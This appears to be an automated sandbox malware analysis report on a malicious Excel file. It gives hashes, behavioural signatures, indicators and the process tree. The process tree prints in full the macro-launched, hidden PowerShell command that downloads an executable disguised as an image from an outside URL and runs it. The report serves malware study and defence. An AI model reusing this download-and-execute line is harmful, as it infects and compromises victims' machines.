8b0d25741392e790fb8656e39374d5222e1154699ceae9d3a2851357428b4592

Analysis

max time kernel
130s
max time network
63s
platform
windows7_x64
resource
win7
submitted
08-07-2020 15:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SecuriteInfo.com.Trojan.GenericKD.43452391.25180.12576.xls
Size

112KB
MD5

60829c4328334854863c5b7bf47fd7a9
SHA1

3bdafc47b415aa9dd39b4d5442ad59c014d29af4
SHA256

8b0d25741392e790fb8656e39374d5222e1154699ceae9d3a2851357428b4592
SHA512

98efde59317b172a7636ce4d47d45707f67b90d5414a7d666f4fc85c47246af286aec87d2f86798e562de012a3ba466166f95eca13f121df13f81e521c8a6e0d

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://crogtrt.com/IG/601377020.jpg

Signatures

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
892	EXCEL.EXE

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	112	892	cmd.exe	23

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	288	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
288	powershell.exe
288	powershell.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
892	EXCEL.EXE
892	EXCEL.EXE
892	EXCEL.EXE

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 892 wrote to memory of 112	892	EXCEL.EXE	24
PID 892 wrote to memory of 112	892	EXCEL.EXE	24
PID 892 wrote to memory of 112	892	EXCEL.EXE	24
PID 112 wrote to memory of 288	112	cmd.exe	26
PID 112 wrote to memory of 288	112	cmd.exe	26
PID 112 wrote to memory of 288	112	cmd.exe	26

Blacklisted process makes network request 1 IoCs

flow	pid	Process
4	288	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
288	powershell.exe

Office loads VBA resources, possible macro or embedded object present

C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.GenericKD.43452391.25180.12576.xls
1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:892
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://crogtrt.com/IG/601377020.jpg',$env:Temp+'\Name.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\Name.exe')
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:112
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://crogtrt.com/IG/601377020.jpg',$env:Temp+'\Name.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\Name.exe')
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious behavior: EnumeratesProcesses
    - Blacklisted process makes network request
    - Suspicious behavior: GetForegroundWindowSpam
    PID:288

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads